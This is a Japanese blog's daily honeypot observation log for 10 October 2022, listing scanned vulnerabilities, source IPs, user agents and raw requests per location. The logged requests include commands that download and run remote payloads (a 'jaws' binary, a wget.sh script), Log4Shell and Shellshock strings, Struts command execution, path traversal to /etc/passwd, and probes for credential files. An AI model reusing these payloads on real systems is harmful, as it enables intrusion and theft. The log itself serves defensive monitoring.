コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/10/10 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/10/10分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
/.envへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
curlによるスキャン行為
/.gitへのスキャン行為

を確認しました。

Location:US

Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 185.216.71.192/jaws;
sh /tmp/jaws
Location:UK

Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
Polycom PBX製品へのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 185.216.71.192/jaws;
sh /tmp/jaws
Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
FortiOSの脆弱性(CVE-2018-13379)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Oracle WebLogic脆弱性(CVE-2017-3506)を狙うアクセス
Oracle WebLogic脆弱性(CVE-2018-2894)を狙うアクセス
ShellShock脆弱性(CVE-2014-7169)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
Nessusによるスキャン行為
curlによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
127.0.0.1に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 185.216.71.192/jaws;
sh /tmp/jaws
アクセス数推移

JP:総アクセス数:56 (前日比:-21)
US:総アクセス数:71 (前日比:-11)
UK:総アクセス数:69 (前日比:17)
SG:総アクセス数:2516 (前日比:2369)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.145.36.218 United States
1 4.233.139.191 United States
1 18.222.145.203 United States
2 20.83.24.250 United States
1 20.117.187.135 United States
1 20.211.45.185 United States
1 27.43.207.94 China
1 36.110.211.5 China
1 36.110.214.194 China
1 37.19.211.43 United Kingdom
1 45.61.185.198 United States
1 45.83.65.83 Germany
6 95.214.235.205 Ukraine
1 104.194.10.202 United States
2 128.199.82.27 United Kingdom
9 135.125.246.110 France
8 135.125.246.189 France
3 138.68.173.189 United States
1 157.230.9.147 United States
1 157.245.80.71 United States
2 159.89.188.116 United States
3 159.203.94.154 United States
1 159.223.229.13 United States
1 170.253.2.246 Spain
1 185.220.101.189 Germany
2 185.254.196.115 Ukraine
1 192.241.201.91 United States
1 198.235.24.21 United States

UserAgent一覧

件数 UserAgent
14 -
1 Mozilla/5.0 (Linux; Android 7.1.1; CPH1729) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 9; SM-G973U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
1 Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
30 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Wget/1.21
1 curl/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 0n\x1f\x0cM\x7f{\x17M\xb5\n
1 MGLNDD_18.179.20.5_80\n
10 \x16\x03\x01
1 \xf6Z\n
31 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /logo.png HTTP/1.1
1 GET /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.1
1 GET http[:]//169[.]254[.]169[.]254/latest/meta-data/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.161.87.74 Germany
1 18.222.145.203 United States
1 36.37.185.86 Cambodia
1 37.19.211.43 United Kingdom
2 41.237.36.231 Egypt
1 45.61.185.76 United States
6 45.61.185.198 United States
1 45.83.67.194 Germany
15 51.79.29.48 Canada
9 54.37.79.75 France
1 74.82.47.46 United States
2 152.89.196.211 Russia
1 157.230.9.147 United States
1 157.245.80.71 United States
2 162.142.125.10 United States
4 162.142.125.121 United States
1 167.71.131.91 United States
2 167.94.138.117 United States
1 182.119.227.178 China
9 185.254.196.223 Ukraine
1 192.30.241.102 United States
1 192.241.207.22 United States
2 195.178.120.33 Bulgaria
1 198.235.24.16 United States
1 198.235.24.159 United States
3 222.186.19.235 China

UserAgent一覧

件数 UserAgent
10 -
2 Hello, world
2 Mozila/5.0
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
1 Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
1 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0
37 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
7 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_34.68.118.83_80\n
4 \x16\x03\x01
37 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
2 GET /cgi-bin/;cd+%2Ftmp%3Bwget+http%3A%2F%2F45[.]95[.]55[.]214%2Fa%2Fwget.sh%3Bchmod+777+wget[.]sh%3Bsh+wget[.]sh+Netgear%3Brm+-rf+wget[.]sh HTTP/1.1
7 GET /config/getuser?index=0 HTTP/1.1
6 GET /favicon.ico HTTP/1.1
1 GET /logo.png HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+185[.]216[.]71[.]192/jaws;sh+/tmp/jaws HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
4 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 18.207.159.17 United States
2 20.12.72.189 United States
1 36.110.211.69 China
2 40.122.207.234 United States
1 43.131.66.209 Singapore
1 45.61.185.76 United States
3 45.61.185.198 United States
2 51.222.194.232 Canada
1 65.157.23.94 United States
1 66.240.192.82 United States
1 68.235.43.125 United States
2 80.66.88.215 Russia
1 87.236.176.200 Belgium
1 103.89.88.253 Vietnam
2 104.248.206.149 United States
1 150.138.78.37 China
4 152.32.172.163 Hong Kong
4 152.32.245.144 Hong Kong
2 152.89.196.211 Russia
1 157.230.9.147 United States
1 157.245.80.71 United States
3 165.22.225.204 United States
2 167.94.138.120 United States
2 167.248.133.120 United States
1 172.105.89.161 United States
1 181.214.206.161 United States
2 183.136.225.35 China
1 183.215.152.184 China
1 184.105.247.195 United States
8 185.254.196.223 Ukraine
1 188.165.87.102 France
2 188.166.70.145 United States
3 188.166.77.224 United States
1 192.241.197.66 United States
1 195.178.120.33 Bulgaria
1 198.235.24.3 United States
1 209.127.111.153 Canada
3 222.186.19.235 China

UserAgent一覧

件数 UserAgent
28 -
6 Go-http-client/1.1
1 Hello, world
1 Mozila/5.0
1 Mozilla/5.0 (Linux; Android 7.1.1; Nexus 6 Build/NGI77B; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043507 Safari/537.36 V1_AND_SQ_7.1.8_718_YYB_D QQ/7.1.8.3240 NetType/WIFI WebP/0.3.0 Pixel/1440
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
1 Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14
9 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1 Wget/1.21
1 python-requests/2.28.1

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_132.145.66.34_80\n
1 RP\xfd\rS\xca\x9f\x9eX{\xb6@KM\n
1 \x03\x1d\xa7\xe6r\xcb\x12\x02hY\xbb\xf6\x1c\x10kD\x1f*~8?\x0e<8\x85\x82\xfd\x933\x0e<8>\n
2 \x03
14 \x16\x03\x01
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
10 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /aastra.cfg HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /cgi-bin/;cd+%2Ftmp%3Bwget+http%3A%2F%2F45[.]95[.]55[.]214%2Fa%2Fwget.sh%3Bchmod+777+wget[.]sh%3Bsh+wget[.]sh+Netgear%3Brm+-rf+wget[.]sh HTTP/1.1
4 GET /config/getuser?index=0 HTTP/1.1
1 GET /configs/000000000000.cfg HTTP/1.1
10 GET /favicon.ico HTTP/1.1
1 GET /logo.png HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1
1 GET /polycom/000000000000.cfg HTTP/1.1
3 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+185[.]216[.]71[.]192/jaws;sh+/tmp/jaws HTTP/1.1
2 GET /sitemap.xml HTTP/1.1
1 GET /yealink/y000000000000.cfg HTTP/1.1
1 GET a/etc/passwd\n
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 PRI * HTTP/2.0
1 eval 'local io_l
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
348 3.138.102.34 United States
1044 14.143.114.10 India
609 18.213.110.165 United States
1 18.222.145.203 United States
1 20.168.54.35 United States
1 41.35.153.174 Egypt
1 45.61.185.76 United States
2 45.61.185.198 United States
1 45.83.67.67 Germany
24 51.79.29.48 Canada
1 51.159.164.227 France
440 52.213.45.239 United States
1 54.37.79.75 France
1 62.225.41.210 Germany
2 80.87.206.247 Russia
1 89.179.126.151 Russia
1 103.60.60.186 Singapore
1 112.237.83.158 China
1 117.194.153.85 India
1 117.213.41.27 India
2 134.122.28.238 United States
2 143.110.244.47 United States
4 152.32.181.45 Hong Kong
2 152.89.196.211 Russia
1 157.230.9.147 United States
2 162.142.125.8 United States
2 162.142.125.213 United States
2 167.94.138.118 United States
2 167.99.41.143 United States
2 167.248.133.120 United States
1 172.104.242.173 United States
1 172.105.89.161 United States
2 172.245.21.133 United States
1 184.105.139.86 United States
1 192.241.206.56 United States
2 194.165.16.73 Panama
1 195.178.120.116 Bulgaria
1 197.191.3.18 Ghana
1 205.210.31.26 United States
2 222.186.19.235 China

UserAgent一覧

件数 UserAgent
69 ${jndi:ldap://log4shell-generic-S3Kbx1oyAv3LNOvAr0kE${lower:ten}.w.nessus.org/nessus}
70 () { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo \"bash_cve_2014_6278 Output : $((88+77))\"; }
69 () { ignored; }; echo Content-Type: text/plain ; echo ; echo \"bash_cve_2014_6271_rce Output : $((77+99))\"
53 -
4 Go-http-client/1.1
1 Hello, world
789 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
2 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1
1397 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
29 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/11.0.696.50
1 Nessus SOAP v0.0.1 (Nessus.org)
13 Nessus
1 curl/7.81.0

リクエスト内容一覧

件数 Method Request Protocol
1 GNUTELLA CONNECT/0.4
1 GNUTELLA CONNECT/0.6
1 MGLNDD_13.67.44.234_80
2 \x03
1 \x16\x03\x01\x02\xb2\x01
5 \x16\x03\x01\x02
13 \x16\x03\x01
2 \x16\x03
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1 CONNECT mkzaim[.]ru:443 HTTP/1.1
1 GET %. HTTP/1.1
1 GET %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.1
1 GET ../../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET ../../../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../ HTTP/1.1
1 GET .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/windows/win.ini HTTP/1.1
1 GET .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/winnt/win.ini HTTP/1.1
1 GET /# HTTP/1.1
1 GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.1
1 GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini HTTP/1.1
1 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
1 GET /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\windows\\win.ini HTTP/1.1
1 GET /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\winnt\\win.ini HTTP/1.1
1 GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1
1 GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt%2fwin.ini HTTP/1.1
1 GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin%2eini HTTP/1.1
1 GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
1 GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin%2eini HTTP/1.1
1 GET /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin.ini HTTP/1.1
1 GET /%80../%80../%80../%80../%80../%80../windows/win.ini HTTP/1.1
1 GET /%80../%80../%80../%80../%80../%80../winnt/win.ini HTTP/1.1
1 GET /%NETHOOD%/ HTTP/1.1
1 GET /%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/windows/win.ini HTTP/1.1
1 GET /%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/winnt/win.ini HTTP/1.1
1 GET /%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./windows/win.ini HTTP/1.1
1 GET /%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./winnt/win.ini HTTP/1.1
1 GET /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd HTTP/1.1
1 GET /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini HTTP/1.1
1 GET /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/winnt/win.ini HTTP/1.1
1 GET /+CSCOE+/logon.html HTTP/1.1
1 GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
1 GET /.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1
1 GET /.%252e/.%252e/.%252e/.%252e/winnt/win.ini HTTP/1.1
1 GET /.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
1 GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
1 GET /..../..../..../..../..../..../..../..../..../..../..../..../etc/passwd HTTP/1.1
1 GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1
1 GET /..../..../..../..../..../..../..../..../..../winnt/win.ini HTTP/1.1
1 GET /....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini HTTP/1.1
1 GET /....\\....\\....\\....\\....\\....\\....\\....\\....\\winnt\\win.ini HTTP/1.1
1 GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1
1 GET /.../.../.../.../.../.../.../.../.../winnt/win.ini HTTP/1.1
1 GET /...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini HTTP/1.1
1 GET /...\\...\\...\\...\\...\\...\\...\\...\\...\\winnt\\win.ini HTTP/1.1
1 GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET /../../../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET /..\\pixfir~1\\how_to_login.html HTTP/1.1
1 GET /..htaccess.swp HTTP/1.1
1 GET /./../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /././.. HTTP/1.1
1 GET /././././././../../../../../etc/passwd HTTP/1.1
1 GET /././././././../../../../../windows/win.ini HTTP/1.1
1 GET /././././././../../../../../winnt/win.ini HTTP/1.1
1 GET /./WEB-INF/ HTTP/1.1
1 GET /.DS_Store HTTP/1.1
1 GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini HTTP/1.1
1 GET /.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini HTTP/1.1
1 GET /.anydomain.test HTTP/1.0
16 GET /.aws/credentials HTTP/1.1
1 GET /.cobalt HTTP/1.1
16 GET /.config/gatsby/config.json HTTP/1.1
16 GET /.cordova/config.json HTTP/1.1
16 GET /.deployment-config.json HTTP/1.1
16 GET /.docker/.env HTTP/1.1
16 GET /.docker/config.json HTTP/1.1
16 GET /.docker/daemon.json HTTP/1.1
16 GET /.docker/laravel/app/.env HTTP/1.1
16 GET /.env.backup HTTP/1.1
16 GET /.env.bak HTTP/1.1
16 GET /.env.dev HTTP/1.1
16 GET /.env.development.local HTTP/1.1
16 GET /.env.dist HTTP/1.1
16 GET /.env.docker.dev HTTP/1.1
16 GET /.env.local HTTP/1.1
16 GET /.env.php HTTP/1.1
16 GET /.env.prod HTTP/1.1
16 GET /.env.production.local HTTP/1.1
16 GET /.env.sample.php HTTP/1.1
16 GET /.env.save HTTP/1.1
16 GET /.env.stage HTTP/1.1
16 GET /.env.test.localapi/.env HTTP/1.1
16 GET /.env.test HTTP/1.1
5 GET /.env.ts HTTP/1.1
47 GET /.env HTTP/1.1
16 GET /.environment HTTP/1.1
16 GET /.envrc HTTP/1.1
16 GET /.envs HTTP/1.1
16 GET /.env~ HTTP/1.1
16 GET /.gitlab-ci/.env HTTP/1.1
1 GET /.htaccess.1 HTTP/1.1
1 GET /.htaccess.bak HTTP/1.1
1 GET /.htaccess.copy HTTP/1.1
1 GET /.htaccess.old HTTP/1.1
1 GET /.htaccess.tmp HTTP/1.1
1 GET /.htaccess.~1~ HTTP/1.1
1 GET /.htaccess HTTP/1.1
1 GET /.htaccess~ HTTP/1.1
1 GET /.htpasswd HTTP/1.1
16 GET /.jupyter/jupyter_notebook_config.json HTTP/1.1
16 GET /.lanproxy/config.json HTTP/1.1
16 GET /.msmtprc HTTP/1.1
16 GET /.s3cfg HTTP/1.1
1 GET /.svn/entries HTTP/1.1
16 GET /.vscode/.env HTTP/1.1
1 GET //${%23context['xwork.MethodAccessor.denyMethodExecution']=!(%23_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('id').waitFor()}.action HTTP/1.1
1 GET //${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.print('Nessus%20Response:%20'),%23w.println('struts_2_3_14_3_command_execution-1914430033'),%23w.flush(),%23w.close()}.action HTTP/1.1
1 GET //${1914430033+5}.action HTTP/1.1
1 GET //../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET //Help[.]action HTTP/1.1
1 GET //RX7_rU3s[.]asp HTTP/1.0
6 GET // HTTP/1.1
1 GET //admincp/login.php HTTP/1.1
1 GET //etc/passwd HTTP/1.1
1 GET //idcplg?IdcService=GET_ENVIRONMENT&IsJson=1 HTTP/1.1
1 GET //login/login HTTP/1.1
1 GET //login[.]jsp HTTP/1.1
1 GET //perl?-v HTTP/1.1
1 GET //perl[.]exe?-v HTTP/1.1
1 GET //struts/webconsole.html HTTP/1.1
1 GET //user/index.php HTTP/1.1
1 GET //wbm/login/ HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /1665325592/certificate/13.67.44.234 HTTP/1.1
1 GET /1665325592/facts/13.67.44.234 HTTP/1.1
1 GET /4taPnY8Z.asmx HTTP/1.1
1 GET /829kmkjg.asp?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.asp?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.aspx?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.aspx?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.cfc?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.cfc?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.cfm?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET /829kmkjg.cfm?<script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET /829kmkjg.cgi?<meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
